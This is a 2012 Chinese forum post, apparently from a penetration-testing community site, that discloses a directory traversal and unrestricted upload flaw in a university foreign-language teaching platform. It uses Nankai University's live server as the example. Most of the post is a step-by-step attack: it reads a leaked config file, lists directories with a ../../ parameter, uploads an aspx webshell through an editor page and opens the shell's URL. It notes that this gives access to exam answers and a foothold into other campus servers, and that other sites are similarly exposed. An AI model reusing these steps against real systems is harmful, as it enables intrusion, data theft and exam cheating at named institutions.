中国网络渗透测试联盟
标题:
新理念外语网络教学平台文件上传漏洞
[打印本页]
作者:
admin
时间:
2012-12-4 11:10
标题:
新理念外语网络教学平台文件上传漏洞
好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
5 h. N/ Z# i8 G& E3 f; R! H. x$ k; h
% G3 [& l0 M; m6 s0 P* [: ^! {
详细说明:
# n% g# Z" R) T- e
7 u5 m2 w* f6 S& z3 `4 Z- A
以南开大学的为例:
$ j \5 O) Q3 M- {
http://222.30.60.3/NPELS
& r5 u' ?3 z- O5 _. U
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
, f7 d# e$ Q* g X" f H8 F( g1 h
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
# }4 G# R* W; y1 u1 X+ m* e, \; S2 }
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
3 J* ]9 i% q7 h+ \! V3 z4 k
</setting>
0 [* F; H- k( I* T# V
及版本号
8 `6 ]" y- J: e
<add key="TVersion" value="1, 0, 0, 2187">
4 w& x6 V. @3 ?/ G& g
</add>
) g' v5 W3 f9 o( U/ q7 R
直接访问
9 k1 F. [# l& B: k& M
http://222.30.60.3/NPELS/CommonService.asmx
5 n& x+ Z2 L' n" B5 t2 X$ Q- W* R
使用GetTestClientFileList操作,直接 HTTP GET 列目录:
, r6 d% v( I) z* { c
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1
, 0, 0, 2187
, I6 F! q% i2 H" s E9 `6 y
进一步列目录(返回的网页很大,可以直接 wget 下来)
: U/ N( [1 E1 G" |( @5 O! e
http://222.30.60.3/NPELS/CommonS ... List?version=../../
2 b4 p; O! K y5 i. e
: S- v; p% A' p7 l2 h- Q" V o g
发现
& A! c4 J( i& F7 v! C5 M
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
3 B/ j6 E% t. {+ Z
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头
- j3 p% P8 z$ j$ T0 f8 X
上传后继续列目录找到木马地址直接访问即可
3 w2 d0 F2 I7 K7 g. K& h* d$ d4 O* Q
# E- y0 s9 ]) F
OOXX
! I4 `3 X% x( g- K& |
1 O0 I. I k. S# W3 D ?0 F7 G
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
- Y! v% E: t% T |9 v' h
漏洞证明:
: Q. q9 a w3 |( {9 M8 y/ u& C
. b i! J- {+ r
列目录:
& i& \# ]8 }. I4 Z9 }
http://222.30.60.3/NPELS/CommonS ... List?version=../../
) G# }+ X4 \, w. z9 ]8 }- J) D
文件上传:
3 T% U: g- X$ N% V& {* n
http://222.30.60.3/npelsv/editor/editor.htm
3 X6 x. ^& G4 v& i9 V
" W$ I2 M; [7 T [. p- p& q
上传木马:
: d, W: k8 j. t& v0 ?1 {
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
5 B4 e: t) N. B, @4 U
% M H: B5 n5 B8 j; v: Z. h
修复方案:
k) N& ]2 |! W( P1 `% |0 d
好像考试系统必须使用 CommonService.asmx
" _0 E `9 V, Q6 W, N5 o7 A
最好配置文件加密或者用别的方式不让它泄露出来
$ d8 h; ~( I' B3 V: _! H
并且检查或删除各上传入口,像
http://222.30.60.3/NPELS/Upload.aspx
一样
2 ^% x7 B) R- ~$ X! r- C
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2